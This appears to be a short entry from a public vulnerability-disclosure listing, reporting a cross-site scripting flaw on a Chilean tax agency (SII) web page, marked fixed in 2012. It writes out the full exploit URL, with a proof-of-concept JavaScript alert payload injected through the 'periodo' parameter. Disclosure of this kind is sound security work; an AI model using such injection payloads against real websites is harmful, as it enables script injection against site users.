...[<Vulnerability: 2202>]
Affected Entity: Servicio de Impuestos Internos - Chile
Actions: TweetMain URI: https://alerce.sii.cl/
Type: Cross Site Scripting
Exploitable URI: https://alerce.sii.cl/dior_cgi/ren_mp/REN_ConsultarEmpleadores.cgi?flagLlamada=0&periodo=111111%22;%20alert%28/XSS/%29;%20//
Status: Fixed
Date: Jan. 25, 2012, 10:16 p.m.
Comments:
La vulnerabilidad fue reportada hace 8 dias y no han dado solucion. Es posible inyectar codigo html/javascript (xss) mediante la variable "periodo"